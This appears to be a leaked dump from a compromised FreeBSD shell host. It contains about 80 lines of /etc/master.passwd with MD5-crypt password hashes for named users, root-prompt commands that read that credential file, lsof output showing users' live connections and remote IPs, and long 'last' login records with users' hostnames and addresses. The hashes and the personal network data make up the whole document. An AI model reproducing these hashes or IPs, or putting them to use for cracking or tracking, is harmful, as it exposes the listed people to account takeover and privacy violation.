asriel:$1$VbcBqSUx$JEQvA2lwRWPqk.0w11oes/:1247:1247::0:0:User &:/home/asriel:/usr/local/bin/bash
|
||
devil:$1$q6WNzUIk$/Qv4J3E.fbG/JE4j.hHAL/:1248:1248::0:0:User &:/home/devil:/usr/local/bin/bash
|
||
lymelyte:$1$nqTvcQub$visWqXp3cKGDkwc25KYNl0:1249:1249::0:0:User &:/home/lymelyte:/usr/local/bin/bash
|
||
cmm:$1$ekGdXp0j$hUyJVyP3UXWhCOHVtCq/N1:1250:1250::0:0:User &:/home/cmm:/usr/local/bin/bash
|
||
nek0o:$1$PUmJEvpa$ZrIV7QV6Qf3GJn5cEOTIu0:1252:1252::0:0:User &:/home/nek0o:/usr/local/bin/bash
|
||
baxxta:$1$apBmnTij$hZw5VnHaUpHlSuOIYNfD20:1253:1253::0:0:User &:/home/baxxta:/usr/local/bin/bash
|
||
bruhaha:$1$HH2GgFl4$cmXD/bE438EiLmIbJyqdR1:1254:1254::0:0:User &:/home/bruhaha:/usr/local/bin/bash
|
||
dv327:$1$MDTcfoUl$154clLyjNZI4qgtQzyrDq/:1258:1258::0:0:User &:/home/dv327:/usr/local/bin/bash
|
||
voxitize:$1$DWOR6B.M$ppBHJaNOS4LvRrOhbphX2/:1261:1261::0:0:User &:/home/voxitize:/usr/local/bin/bash
|
||
own3d:$1$kCOJh8SJ$KwEe1bJ8e.JS3Nm.xwYb10:1262:1262::0:0:User &:/home/own3d:/usr/local/bin/bash
|
||
feed:$1$RHeHyv6H$v1cnIn1fKUwC9k.got3dl.:1264:1264::0:0:User &:/home/feed:/usr/local/bin/bash
|
||
yaquis:$1$68F1SID1$b9H5Bbj/fNYsvUhqgpr9Q1:1266:1266::0:0:User &:/home/yaquis:/usr/local/bin/bash
|
||
bpunux:$1$SqaNE5JP$bp1vJn3I4Rr6oZ6eJAmvz0:1269:1269::0:0:User &:/home/bpunux:/usr/local/bin/bash
|
||
skypilot:$1$0iDevIYV$Oi53AE7YFrB6AaBnAfcn7.:1271:1271::0:0:User &:/home/skypilot:/usr/local/bin/bash
|
||
blake96:$1$KwitdaYi$2EyIIukI8gEIxZCHwwj4U.:1272:1272::0:0:User &:/home/blake96:/usr/local/bin/bash
|
||
blotch:$1$rYr2mFcV$HPpQFgQacg4ScPjvNfYR31:1274:1274::0:0:User &:/home/blotch:/usr/local/bin/bash
|
||
scouse:$1$du5wftbl$lVamWsT/nEKT75D/IelEI/:1275:1275::0:0:User &:/home/scouse:/usr/local/bin/bash
|
||
mogle3:$1$Fo7FY4Sw$ioqHiMhZ/8BBDZjg39BR41:1276:1276::0:0:User &:/home/mogle3:/usr/local/bin/bash
|
||
ste:$1$H4hxohFI$se6RPLcCpkl/LY4aUiov6.:1277:1277::0:0:User &:/home/ste:/usr/local/bin/bash
|
||
omgwtf:$1$eK9d4q9r$eCZMCR.GRqmt6oOhrbam11:1281:1281::0:0:User &:/home/omgwtf:/usr/local/bin/bash
|
||
brosb4:$1$NQd5q63M$62LY3LnPxuPbrBmTANOkm1:1283:1283::0:0:User &:/home/brosb4:/usr/local/bin/bash
|
||
mindben:$1$xrm2x1nF$DnA.Wkg4q9ImdLOA75IT00:1284:1284::0:0:User &:/home/mindben:/usr/local/bin/bash
|
||
hixk:$1$p2dRk8OC$XpC/2o0jwotue0Tmbdr3R0:1286:1286::0:0:User &:/home/hixk:/usr/local/bin/bash
|
||
omen:$1$eT86NXcE$.ouer9/Fp/lv04NAhli5a1:1287:1287::0:0:User &:/home/omen:/usr/local/bin/bash
|
||
sakik1:$1$PujiBsEC$Syl3nyJzAObvu2UcpfbVd/:1290:1290::0:0:User &:/home/sakik1:/usr/local/bin/bash
|
||
chriys:$1$R0.IBcw2$VILPHOKDvQts2eyy6ndoK0:1291:1291::0:0:User &:/home/chriys:/usr/local/bin/bash
|
||
jtracy:$1$RxPgmSPJ$/O7J8PYHUMZHIx/4hJ0XE0:1292:1292::0:0:User &:/home/jtracy:/usr/local/bin/bash
|
||
roodyk:$1$0Bo4ZY89$ray17Ga4HpE2QtaFiHOg11:1293:1293::0:0:User &:/home/roodyk:/usr/local/bin/bash
|
||
qfx:$1$miBfwHok$ODKoxjFkZSYxfQqzQX96A1:1295:1295::0:0:User &:/home/qfx:/usr/local/bin/bash
|
||
chrisdad:$1$hurRNkwG$V8PUznOwFheCuU6TCWic4.:1296:1296::0:0:User &:/home/chrisdad:/usr/local/bin/bash
|
||
rice21:$1$nB9dgK9c$XmTcPL/ig7xDxT1iIbY4..:1298:1298::0:0:User &:/home/rice21:/usr/local/bin/bash
|
||
wchan21:$1$Ia3.DKEB$oTtcBvRdagIb59HbVfc3l0:1299:1299::0:0:User &:/home/wchan21:/usr/local/bin/bash
|
||
xkelsx:$1$iWNCktLQ$F37FwcA8XlJuiSk0RqB1p1:1300:1300::0:0:User &:/home/xkelsx:/usr/local/bin/bash
|
||
jerryste:$1$lUhhapJy$Hi6dQ4ToW6xAPMjfK5bBS1:1302:1302::0:0:User &:/home/jerryste:/usr/local/bin/bash
|
||
pbx:$1$Ln.hfEBz$k/Q1E0leCS9T.gLaPPpBA.:1303:1303::0:0:User &:/home/pbx:/usr/local/bin/bash
|
||
mlh:$1$9kndvAsu$/kIT6xRBCsb8nf8.m0kPV.:1307:1307::0:0:User &:/home/mlh:/usr/local/bin/bash
|
||
howell1:$1$Vtbi5SB.$w6W4pZ/Pc/TfPA0y0jod4/:1308:1308::0:0:User &:/home/howell1:/usr/local/bin/bash
|
||
djkarl:$1$aEJTRbAG$3eWTZQ4CgwGbHbAfHHl4P.:1309:1309::0:0:User &:/home/djkarl:/usr/local/bin/bash
|
||
subkult:$1$2QPeEVKb$bCL0KYncuAGfIO4FKWW3N1:1310:1310::0:0:User &:/home/subkult:/usr/local/bin/bash
|
||
dealer:$1$mITFxoNU$lJtxGqUo2K4rE6/PYLYCg/:1311:1311::0:0:User &:/home/dealer:/bin/sh
|
||
cont:$1$Hl1DCBfm$HO43dbNlGn6TZvo/F2zTH0:1312:1312::0:0:User &:/home/cont:/usr/local/bin/bash
|
||
ircusr:$1$X1181Xd3$524I5czvIWxCkduxRuKhk1:1313:1313::0:0:User &:/home/ircusr:/usr/local/bin/bash
|
||
lordy:$1$y5CwHmRO$PZRJ/aY7BtMqY9FagatZR1:1314:1314::0:0:User &:/home/lordy:/usr/local/bin/bash
|
||
chozen1:$1$qc4UoXsN$U/YTbetNKaZ/RwEYpWOdP1:1315:1315::0:0:User &:/home/chozen1:/usr/local/bin/bash
|
||
nardi:$1$ttRgdp5X$kq1Gb/4FPSmGdbiYBEwt1/:1316:1316::0:0:User &:/home/nardi:/usr/local/bin/bash
|
||
ssaws:*LOCKED*$1$.qT8FvGI$l60rRjSoGgG699wR51Ie/0:1317:1317::0:0:User &:/home/ssaws:/usr/local/bin/bash
|
||
chaos1:$1$hgGtAmCk$BzvUVeU8f38CKZPr4CcZ/1:1318:1318::0:0:User &:/home/chaos1:/usr/local/bin/bash
|
||
jax66:$1$4TWJjUIH$Pm/erJRmRgc01FCVakDfB.:1319:1319::0:0:User &:/home/jax66:/usr/local/bin/bash
|
||
paleride:$1$ahPjbJV5$g63Rwng/2D9rKeK0bIwdx.:1320:1320::0:0:User &:/home/paleride:/usr/local/bin/bash
|
||
kokoryu:$1$NVQwZzru$VjR4eW9CGrT.YF6nh72Ke0:1321:1321::0:0:User &:/home/kokoryu:/usr/local/bin/bash
|
||
bluewish:$1$rQtdB28x$5bGykkOQ8gr5lx1qHYlRs1:1322:1322::0:0:User &:/home/bluewish:/usr/local/bin/bash
|
||
grumpy:$1$o.biiCj3$5AG9SpDJjbNUSSnnJ92uc.:1323:1323::0:0:User &:/home/grumpy:/usr/local/bin/bash
|
||
jaiven:$1$y.IDqqL3$u7netp1tGxbhjKfbd6XTO0:1324:1324::0:0:jusam69:/home/jaiven:/usr/local/bin/bash
|
||
rikt:$1$Fjry.jO8$9hNprEmsN9GLULLeZvb.o1:1325:1325::0:0:User &:/home/rikt:/usr/local/bin/bash
|
||
sal:$1$AuSJnmDL$YSdEP0KfVzRRVCiyhnnhj.:1326:1326::0:0:User &:/home/sal:/usr/local/bin/bash
|
||
lailoke:$1$EC6X0Zz.$DdVRj0ju8ua4DKMFCAFUo/:1327:1327::0:0:User &:/home/lailoke:/usr/local/bin/bash
|
||
kingzy:$1$qm46wwsJ$QNk/qT5dDS2bXr87qZpMi0:1328:1328::0:0:User &:/home/kingzy:/usr/local/bin/bash
|
||
delion1:$1$awK8R.nN$0GCL5dcuK1cirjfudAqHY0:1329:1329::0:0:User &:/home/delion1:/usr/local/bin/bash
|
||
vietnigh:$1$FdwjedVt$tmUPUlfiHYr/bTUivlFn01:1330:1330::0:0:User &:/home/vietnigh:/usr/local/bin/bash
|
||
darkuno3:$1$L9VYcl3k$mIQ9ahiFi0Sy0Oc8re8TM0:1331:1331::0:0:User &:/home/darkuno3:/usr/local/bin/bash
|
||
mae21:$1$aVUu0DTg$jvYomCsK1cewfLWHurOlv0:1332:1332::0:0:User &:/home/mae21:/usr/local/bin/bash
|
||
redrum:$1$WFOWXv8b$Rqxxha5.d8WjszhU0AKXC.:1333:1333::0:0:User &:/home/redrum:/usr/local/bin/bash
|
||
cpu:$1$tjEDjNz1$e6.aktoZ6oizYft1eyXMp.:1334:1334::0:0:User &:/home/cpu:/usr/local/bin/bash
|
||
cassand:$1$hZgXLQbv$uE7b8oM88z9qjqhFwka7X/:1335:1335::0:0:User &:/home/cassand:/usr/local/bin/bash
|
||
nyakz:$1$yGPbLpHT$cIcqvBVPmI6fjG9cilKu7/:1336:1336::0:0:User &:/home/nyakz:/usr/local/bin/bash
|
||
ioplex:$1$FSJ1qmmR$zFt5TGcDNeAQOcWCiWQZq0:1337:1337::0:0:User &:/home/ioplex:/usr/local/bin/bash
|
||
dasboot:$1$PgS728fU$IfecoKOgPjuVFep1GIesx.:1338:1338::0:0:User &:/home/dasboot:/usr/local/bin/bash
|
||
visage:$1$jGAd8QtY$Fi4fFEemJYjj0/gu9oDDc1:1339:1339::0:0:User &:/home/visage:/usr/local/bin/bash
|
||
brosco:$1$kpHOwub.$2odvLK5iEXASTkwbcuilY0:1340:1340::0:0:User &:/home/brosco:/usr/local/bin/bash
|
||
mrts:$1$f8026tqY$cxdY57bGxA11PdflJBaET/:1341:1341::0:0:User &:/home/mrts:/usr/local/bin/bash
|
||
qberto:$1$qprEj3J4$VzXPUlgGqiKKlZIml3M8y/:1342:1342::0:0:User &:/home/qberto:/usr/local/bin/bash
|
||
kooner:$1$Kl19GSGx$ZjpFwBynWbIT40iEkCfxg/:1343:1343::0:0:User &:/home/kooner:/usr/local/bin/bash
|
||
matt:$1$Mj6LerXV$SnwLvGTJI5hQbZLi7ho96/:1344:1344::0:0:User &:/home/matt:/usr/local/bin/bash
|
||
alexbb:$1$6LLUjutX$OiYpyvVAi60xC2sFVA4OP0:1345:1345::0:0:User &:/home/alexbb:/usr/local/bin/bash
|
||
psycoz:$1$UgwFHV0f$4/V6NqEuYTJL2GwpfwjYb.:1346:1346::0:0:User &:/home/psycoz:/usr/local/bin/bash
|
||
brex132:$1$lhno75FQ$L5fsLgcdEObDqCp55rkQn/:1347:1347::0:0:User &:/home/brex132:/usr/local/bin/bash
|
||
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
|
||
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
|
||
[root@velocity:/var/run]#
|
||
|
||
[root@velocity:/]# cat /etc/master.passwd | grep romeo
|
||
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
|
||
[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
|
||
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
|
||
|
||
|
||
[root@velocity:/]# lsof -i -n | grep romeo
|
||
irssi 32525 romeo 3u IPv4 0xcc67d000 0t0 TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
|
||
irssi 32525 romeo 4u IPv4 0xc9254740 0t0 TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
|
||
irssi 32525 romeo 5u IPv4 0xc9c76cb0 0t0 TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
|
||
irssi 32525 romeo 20u IPv4 0xc5bf1ae0 0t0 TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
|
||
sshd 83595 romeo 3u IPv4 0xc58a23a0 0t0 TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
|
||
[root@velocity:/]# lsof -i -n | grep pimpinjg
|
||
sshd 82325 pimpinjg 3u IPv4 0xc5480000 0t0 TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)
|
||
|
||
|
||
[root@velocity:~]# last
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 23 18:34 - 19:04 (00:30)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 23 18:13 - 18:33 (00:20)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 23 17:13 - 17:43 (00:30)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:47 still logged in
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42 (00:05)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43 (00:06)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32 (01:12)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36 (01:20)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12 (00:00)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10 (02:10)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25 (00:42)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59 (00:07)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38 (00:01)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28 (00:01)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43 (00:28)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14 (00:02)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07 (00:04)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14 (00:28)
|
||
alexbb ttypd 53551eb9.cable.c Tue Jun 23 00:29 - 00:29 (00:00)
|
||
katsst ttypf cpe-75-84-149-5. Mon Jun 22 23:35 - 00:05 (00:30)
|
||
katsst ttypd cpe-75-84-149-5. Mon Jun 22 23:15 - 23:35 (00:19)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05 (00:50)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14 (00:07)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54 (00:31)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36 (00:00)
|
||
blkgraz ttypf cpe-66-25-54-163 Mon Jun 22 17:41 - 23:35 (05:53)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24 (00:43)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37 (00:24)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21 (00:01)
|
||
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19 (00:33)
|
||
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40 (00:02)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49 (00:19)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26 (00:05)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18 (00:01)
|
||
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12 (00:08)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03 (00:02)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00 (00:04)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55 (00:11)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12 (00:03)
|
||
pimpinjg ttypf cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06 (00:00)
|
||
katsst ttypd cpe-75-84-149-5. Mon Jun 22 02:44 - 03:14 (00:30)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33 (00:01)
|
||
katsst ttypg cpe-75-84-149-5. Mon Jun 22 00:20 - 00:50 (00:30)
|
||
hts ttypf pool-71-114-161- Mon Jun 22 00:15 - 00:49 (00:33)
|
||
smash ttypd c-98-232-250-179 Sun Jun 21 22:54 - 01:28 (02:34)
|
||
chaos1 ttypd c-69-143-254-180 Sun Jun 21 22:06 - 22:09 (00:03)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48 (00:50)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51 (00:16)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23 (00:16)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25 (00:03)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08 (00:06)
|
||
apo ttypd d75-152-200-195. Sun Jun 21 15:03 - 15:26 (00:22)
|
||
apo ttypd d75-152-200-195. Sun Jun 21 15:03 - 15:03 (00:00)
|
||
kokoryu ftp 82-45-111-232.c Sun Jun 21 13:43 - 13:54 (00:10)
|
||
cazz1961 ttypd 5ad95c74.bb.sky. Sun Jun 21 06:09 - 06:40 (00:30)
|
||
ste ttype doc-24-32-94-198 Sat Jun 20 20:50 - 21:21 (00:30)
|
||
matt ttypd 71.81.144.135 Sat Jun 20 19:27 - 20:00 (00:32)
|
||
matt ftp 71.81.144.135 Sat Jun 20 19:24 - 19:30 (00:06)
|
||
matt ttypd 71.81.144.135 Sat Jun 20 18:09 - 18:46 (00:36)
|
||
matt ftp 71.81.144.135 Sat Jun 20 17:19 - 17:24 (00:05)
|
||
matt ttypd 71.81.144.135 Sat Jun 20 17:06 - 17:56 (00:50)
|
||
matt ftp 71.81.144.135 Sat Jun 20 17:04 - 17:09 (00:05)
|
||
matt ftp 71.81.144.135 Sat Jun 20 16:56 - 17:02 (00:05)
|
||
yaquis ttypd ip72-223-92-235. Sat Jun 20 16:35 - 17:05 (00:30)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29 (00:10)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 14:22 - 14:23 (00:01)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 14:17 - 14:22 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 14:12 - 14:16 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 14:06 - 14:11 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 14:01 - 14:06 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:56 - 14:01 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:51 - 13:56 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:46 - 13:50 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:40 - 13:45 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:35 - 13:40 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:30 - 13:35 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:25 - 13:30 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:20 - 13:25 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:15 - 13:19 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:09 - 13:14 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 13:04 - 13:09 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:59 - 13:04 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:54 - 12:59 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:49 - 12:54 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:44 - 12:48 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:38 - 12:43 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:33 - 12:38 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:28 - 12:33 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:23 - 12:28 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:18 - 12:23 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:13 - 12:17 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:07 - 12:12 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 12:02 - 12:07 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:57 - 12:02 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:52 - 11:57 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:47 - 11:51 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:41 - 11:46 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:36 - 11:41 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:31 - 11:36 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:26 - 11:31 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:21 - 11:26 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:16 - 11:20 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:10 - 11:15 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:05 - 11:10 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 11:00 - 11:05 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:55 - 11:00 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:50 - 10:55 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:45 - 10:49 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:39 - 10:44 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:34 - 10:39 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:29 - 10:34 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:24 - 10:29 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:19 - 10:24 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:14 - 10:18 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:08 - 10:13 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 10:03 - 10:08 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:58 - 10:03 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:53 - 09:58 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:48 - 09:53 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:43 - 09:47 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:37 - 09:42 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:32 - 09:37 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:27 - 09:32 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:22 - 09:27 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:17 - 09:22 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:12 - 09:16 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:06 - 09:11 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 09:01 - 09:06 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:56 - 09:01 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:51 - 08:56 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:46 - 08:51 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:41 - 08:45 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:35 - 08:40 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:30 - 08:35 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:25 - 08:30 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:20 - 08:25 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:15 - 08:20 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:10 - 08:14 (00:04)
|
||
brosco ftp 99-19-91-167.li Sat Jun 20 08:02 - 08:09 (00:07)
|
||
omgwtf ttypd 24-216-119-13.dh Sat Jun 20 04:49 - 04:55 (00:05)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14 (00:00)
|
||
kruapra ttypd 75.80.56.213 Sat Jun 20 01:08 - 01:38 (00:30)
|
||
yaquis ttypd 186.136.137.30 Fri Jun 19 23:51 - 23:57 (00:05)
|
||
yaquis ttypd ip72-223-92-235. Fri Jun 19 22:17 - 22:48 (00:30)
|
||
pimpinjg ttypd 76.175.20.182 Fri Jun 19 20:41 - 20:43 (00:01)
|
||
psycoz ttypd xdsl-213-196-228 Fri Jun 19 18:53 - 19:10 (00:16)
|
||
psycoz ttypd xdsl-213-196-228 Fri Jun 19 18:50 - 18:50 (00:00)
|
||
yaquis ttypd 186.136.137.30 Fri Jun 19 18:24 - 18:27 (00:02)
|
||
matt ftp 75-130-211-104. Fri Jun 19 17:13 - 17:23 (00:09)
|
||
matt ftp 75-130-211-104. Fri Jun 19 16:57 - 17:02 (00:05)
|
||
matt ttypd 75-130-211-104.d Fri Jun 19 16:56 - 17:12 (00:16)
|
||
matt ftp 75-130-211-104. Fri Jun 19 15:49 - 15:50 (00:00)
|
||
matt ttypd 75-130-211-104.d Fri Jun 19 15:44 - 15:50 (00:05)
|
||
matt ftp 75-130-211-104. Fri Jun 19 15:43 - 15:49 (00:05)
|
||
matt ftp 75-130-211-104. Fri Jun 19 15:18 - 15:36 (00:18)
|
||
matt ftp 75-130-211-104. Fri Jun 19 15:10 - 15:16 (00:06)
|
||
matt ftp 75-130-211-104. Fri Jun 19 15:02 - 15:08 (00:05)
|
||
matt ftp 75-130-211-104. Fri Jun 19 14:55 - 15:00 (00:05)
|
||
matt ttypd 75-130-211-104.d Fri Jun 19 14:48 - 15:36 (00:47)
|
||
matt ftp 75-130-211-104. Fri Jun 19 14:46 - 14:53 (00:06)
|
||
matt ttypd 75-130-211-104.d Fri Jun 19 14:33 - 14:46 (00:12)
|
||
matt ftp 75-130-211-104. Fri Jun 19 14:29 - 14:40 (00:10)
|
||
matt ttypd 75-130-211-104.d Fri Jun 19 14:18 - 14:33 (00:14)
|
||
matt ftp 75-130-211-104. Fri Jun 19 14:17 - 14:25 (00:07)
|
||
matt ftp 75-130-211-104. Fri Jun 19 14:14 - 14:15 (00:01)
|
||
matt ftp 75-130-211-104. Fri Jun 19 14:06 - 14:11 (00:05)
|
||
pimpinjg ttypf cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57 (00:04)
|
||
smash ttypd ntora.eml.ee Thu Jun 18 20:44 - 21:12 (00:28)
|
||
yaquis ttypd 186.136.137.30 Thu Jun 18 18:21 - 18:29 (00:08)
|
||
chaos1 ttypf 94-195-18-213.zo Thu Jun 18 16:34 - 16:41 (00:07)
|
||
cpu ttype 63-253-113-213.i Thu Jun 18 15:55 - 18:16 (02:21)
|
||
